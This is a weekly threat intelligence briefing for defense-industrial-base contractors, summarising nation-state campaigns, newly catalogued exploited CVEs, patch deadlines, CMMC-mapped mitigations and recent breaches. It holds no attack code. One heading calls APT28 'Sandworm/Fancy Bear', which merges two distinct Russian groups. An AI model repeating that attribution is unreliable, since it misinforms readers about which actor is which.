Weekly Threat Intelligence Briefing — March 9, 2026

WEEKLY THREAT INTELLIGENCE BRIEFING

Monday, March 9, 2026|Week 10|Prepared for vCISO Clients & Defense Industrial Base Contractors

7

KEV Additions (7 Days)

3

Critical CVEs

4

Active APT Campaigns

3

Major Breach Disclosures

⚠️DIB FOCUS: Items marked with 🎯 have specific relevance to Defense Industrial Base contractors and CMMC compliance requirements.

🔴EMERGING THREATS

Google GTIG: Multi-Nation APT Campaign Targeting Defense Industrial Base🎯[CRITICAL]

MITRE ATT&CK: T1566 – Phishing | T1190 – Exploit Public-Facing App | T1078 – Valid Accounts

Google's Threat Intelligence Group has confirmed sustained, coordinated cyber operations against the Defense Industrial Base from China-, Russia-, Iran-, and North Korea-linked actors. Key TTPs include Operation Dream Job (Lazarus/UNC2970) using fake defense-sector job offers to deliver malware targeting aerospace, defense, and energy. UNC6446 (Iranian-nexus) distributes custom malware via resume builder apps targeting U.S. aerospace and defense verticals. Nation-state actors are increasingly exploiting zero-days in edge devices (VPNs, firewalls, routers) to gain initial access while evading EDR tools. Manufacturing is the most-targeted sector on ransomware data leak sites — directly implicating defense supply chain partners.

Source: The Hacker News / Google GTIG →

APT28 (Sandworm/Fancy Bear) Targets Maritime & Transportation Entities🎯[CRITICAL]

MITRE ATT&CK: T1566.001 – Spearphishing Attachment | T1204.002 – Malicious File

Russia's APT28 is actively exploiting CVE-2026-21509, a Microsoft Office security bypass disclosed in January, in a spear-phishing campaign targeting maritime, transportation, and logistics entities across Poland, Slovenia, Turkey, Greece, and the UAE. The campaign sent approximately 29 weaponized emails across nine countries in a 72-hour window — Office documents that execute malware without user interaction. Norway's PST 2026 threat assessment identifies maritime infrastructure as Russia's top reconnaissance target, with civilian vessels being used for subsea infrastructure surveillance. DIB contractors with maritime exposure should apply MS Office patches immediately.

Source: Maritime Executive / Norway PST 2026 →

Salt Typhoon (China) — Continued Critical Infrastructure & Telecom Targeting🎯[HIGH]

MITRE ATT&CK: T1199 – Trusted Relationship | T1040 – Network Sniffing

Norway's PST confirmed Salt Typhoon has targeted vulnerable network devices in Norwegian critical infrastructure and telecom networks — consistent with the broader global campaign that previously compromised U.S. and Canadian telecom providers. The group exploits network edge devices to gain persistent footholds. CMMC-regulated contractors relying on telecommunications or cloud services should audit third-party provider security posture and review lateral access controls for signs of compromise.

Source: Maritime Executive / PST 2026 Threat Assessment →

Interlock Ransomware: Active DIB Supply Chain Threat🎯[HIGH]

MITRE ATT&CK: T1486 – Data Encrypted for Impact | T1041 – Exfiltration Over C2

Resecurity is tracking Interlock Ransomware's ongoing campaign following the January 2026 attack on National Defense Corporation (NDC) and subsidiary AMTEC — a manufacturer of military ammunition and explosives. The leaked dataset exposed supply chain relationships with Raytheon, SpaceX, Thales, Hanwha, Leonardo, and QinetiQ. Interlock is suspected of nation-state direction and operates as both ransomware and espionage tooling. Any organization in the defense manufacturing supply chain that interfaces with NDC/AMTEC is potentially exposed to secondary targeting.

Source: Resecurity →

⚡EXPLOITS IN THE WILD — CISA KEV UPDATES

CVE-2026-22719 — Broadcom VMware Aria Operations: Command Injection[CRITICAL]

CVSS Score: 8.1 (High)Affected: VMware Aria Operations (prior to 8.18.6)KEV Added: March 3, 2026Patch Deadline: March 24, 2026

An unauthenticated attacker can execute arbitrary OS commands during a support-assisted product migration process, potentially leading to full remote code execution across cloud environments. Active exploitation confirmed. This vulnerability is particularly dangerous for DIB contractors using VMware for multi-cloud management, as successful exploitation could expose CUI stored within cloud-managed environments.

Source: CISA KEV →

CVE-2021-22681 — Rockwell Studio 5000 / RSLogix: Insufficient Protected Credentials🎯[CRITICAL]

CVSS Score: 9.8 (Critical)Affected: Rockwell Studio 5000 Logix Designer, RSLogix 5000KEV Added: March 5, 2026Patch Deadline: March 26, 2026

An unauthenticated attacker can bypass key-based verification for Logix controllers, enabling impersonation of trusted systems and unauthorized access to industrial automation environments. Critical risk for OT/ICS environments and MTSA-regulated maritime facilities. DIB manufacturers and port facility operators using Rockwell systems should treat this as an immediate patching priority under CMMC AC.L2 and NIST 800-171 access control requirements.

Source: CISA KEV →

CVE-2017-7921 — Hikvision IP Cameras: Improper Authentication[HIGH]

Severity: HighAffected: Multiple Hikvision IP camera series (older firmware)KEV Added: March 5, 2026Patch Deadline: March 26, 2026

A years-old vulnerability resurfaces on the CISA KEV, confirming active exploitation in the wild. The flaw allows credential bypass, privilege escalation, and unauthorized access to device controls. Physical security camera systems at defense contractor facilities are in scope. Operators should audit all Hikvision deployments, apply firmware updates, and segment camera networks from CUI processing environments per CMMC PE (Physical Protection) requirements.

Source: Security Affairs →

CVE-2023-43000 / CVE-2023-41974 — Apple iOS, iPadOS, macOS: Use-After-Free🎯[HIGH]

CVSS Score: 7.8+Affected: Apple iOS, iPadOS, macOS, tvOS, watchOS, SafariKEV Added: March 5, 2026Patch Deadline: March 26, 2026

Multiple Apple platform UAF vulnerabilities allow an application to execute arbitrary code with kernel privileges. Active exploitation confirmed; Google's Threat Intelligence Group provided evidence. FCEB agencies are under mandatory remediation order. DIB contractors using Apple mobile or desktop devices to access CUI should prioritize OS updates across the entire Apple device fleet immediately.

Source: GBHackers →

CVE-2025-40536 — SolarWinds Web Help Desk: Security Control Bypass[HIGH]

Severity: HighAffected: SolarWinds Web Help DeskKEV Added: February 12, 2026

An unauthenticated attacker can gain access to restricted functionality in SolarWinds Web Help Desk. Given SolarWinds' history as a supply chain attack vector and prevalence in government contractor IT environments, this vulnerability carries elevated risk for DIB organizations. Patch to WHD release 2026.1 or later immediately.

Source: CISA KEV →

🛡️MITIGATION GUIDANCE & PRIORITY ACTIONS

[IMMEDIATE]Patch VMware Aria Operations (Deadline: March 24)

Upgrade to VMware Aria Operations 8.18.6 or later. If migration is in progress, halt support-assisted migration until patched. Audit cloud management plane access logs for unauthorized command execution. Applies to: All organizations running VMware Aria Operations.

[IMMEDIATE]Patch Apple Devices (Deadline: March 26)🎯

Apply the latest iOS, iPadOS, and macOS updates across all managed devices. Use MDM to enforce updates in BYOD environments. Especially critical for personnel accessing CUI via mobile devices. CMMC AC.L2-3.1.18 (Control CUI on mobile) applies directly.

[IMMEDIATE]Patch Rockwell Studio 5000 / RSLogix OT Systems (Deadline: March 26)🎯

Apply vendor-supplied mitigations per CISA KEV guidance. Segment Logix controller networks from corporate IT. Implement strict allowlisting of authorized systems communicating with industrial controllers. For MTSA-regulated maritime facilities: this vulnerability directly impacts OT controls in scope for USCG cyber assessments.

[HIGH PRIORITY]Audit Hikvision Camera Infrastructure🎯

Inventory all Hikvision IP cameras at all facilities. Apply latest firmware updates. Enforce network segmentation between physical security systems and any CUI-processing networks. Document remediation to support CMMC PE domain evidence.

[HIGH PRIORITY]Apply Microsoft Office Patches Against APT28 Exploitation🎯

Ensure CVE-2026-21509 (MS Office Security Feature Bypass) is patched on all endpoints. Disable automatic macro execution. Implement email gateway rules blocking weaponized Office attachment types from external senders. Especially urgent for organizations with maritime, logistics, or international supply chain connections matching APT28's target profile.

[MEDIUM]Identity & Credential Hygiene Review🎯

Review privileged account access for SolarWinds, VMware, and cloud management tooling. Rotate credentials on systems covered by this week's KEV additions. Audit MFA enforcement gaps — particularly for IT staff and remote access portals. Map actions to CMMC IA.L2-3.5.3 (MFA) and CM.L2-3.4.1 (Baseline Configuration).

[MEDIUM]DIB Supply Chain Exposure Review — Interlock Ransomware🎯

Organizations with supply chain relationships to NDC, AMTEC, or any prime contractors named in the leaked Interlock dataset (Raytheon, Thales, SpaceX, etc.) should treat supplier-facing portals and shared credential systems as potentially compromised. Review third-party access accounts, rotate shared secrets, and verify integrity of any supplier-provided software or documentation received since January 2026.

📋BREACH DISCLOSURES & NOTABLE INCIDENTS

LexisNexis Legal & Professional — Cloud Infrastructure Breach🎯[CRITICAL]

Disclosed: March 4, 2026Type: Cloud Breach / Data Exfiltration (2.04 GB)Impact: 21,000+ enterprise accounts | ~400,000 user profiles | VPC infrastructure map

Threat actor FulcrumSec exploited an unpatched React front-end vulnerability ("React2Shell") and improperly secured AWS instances on February 24. The compromised data includes U.S. federal judges and DOJ attorneys, making this a supply chain risk for any law firm, government contractor, or compliance organization relying on LexisNexis services. CMMC and legal compliance teams should review LexisNexis vendor agreements and assess whether any CUI flowed through their systems.

Source: SecurityWeek →

Conduent Third-Party Breach Expands to 25 Million Americans[HIGH]

Disclosed: Updated February 2026Type: Third-Party Data Exfiltration (~8 TB)Impact: 25M individuals | TX: 15.4M | OR: 10.5M | SSNs, medical & insurance data

The Conduent breach has grown to 25 million affected Americans. Attackers maintained access for approximately three months, exfiltrating around 8 TB of data including SSNs, medical information, and insurance records. Conduent supports benefits and payment administration for Fortune 100 companies and government programs. Organizations using Conduent as a benefits administrator or HR vendor should treat this as a potential CUI supply chain exposure and notify affected personnel per CMMC IR.L2-3.6.1 incident response requirements.

Source: Malwarebytes →

Madison Square Garden — Oracle E-Business Suite Breach Confirmed

Disclosed: March 2, 2026Type: Cl0p Ransomware / Oracle EBS Zero-Day CampaignImpact: 210+ GB exfiltrated | Names, SSNs compromised

MSG Entertainment confirmed its inclusion in the 2025 Cl0p Oracle EBS exploitation campaign — over 100 organizations were breached via zero-day vulnerabilities in Oracle's E-Business Suite. This is a reminder for any DIB contractor running Oracle EBS for ERP or HR functions: assess whether your Oracle environment was part of the Cl0p campaign footprint and ensure those systems have been fully patched and audited.

Source: SecurityWeek →

About This Report

This weekly briefing is produced by PSY Logistics Technology Partners, Inc. for distribution to vCISO clients and Defense Industrial Base awareness. Intelligence is sourced from CISA, NIST NVD, MITRE ATT&CK, and leading industry threat research. All actions should be verified through official sources before implementation. For questions or custom threat intelligence tailored to your organization's risk profile, contact [email protected] or visit psylogistics.com/news-839758.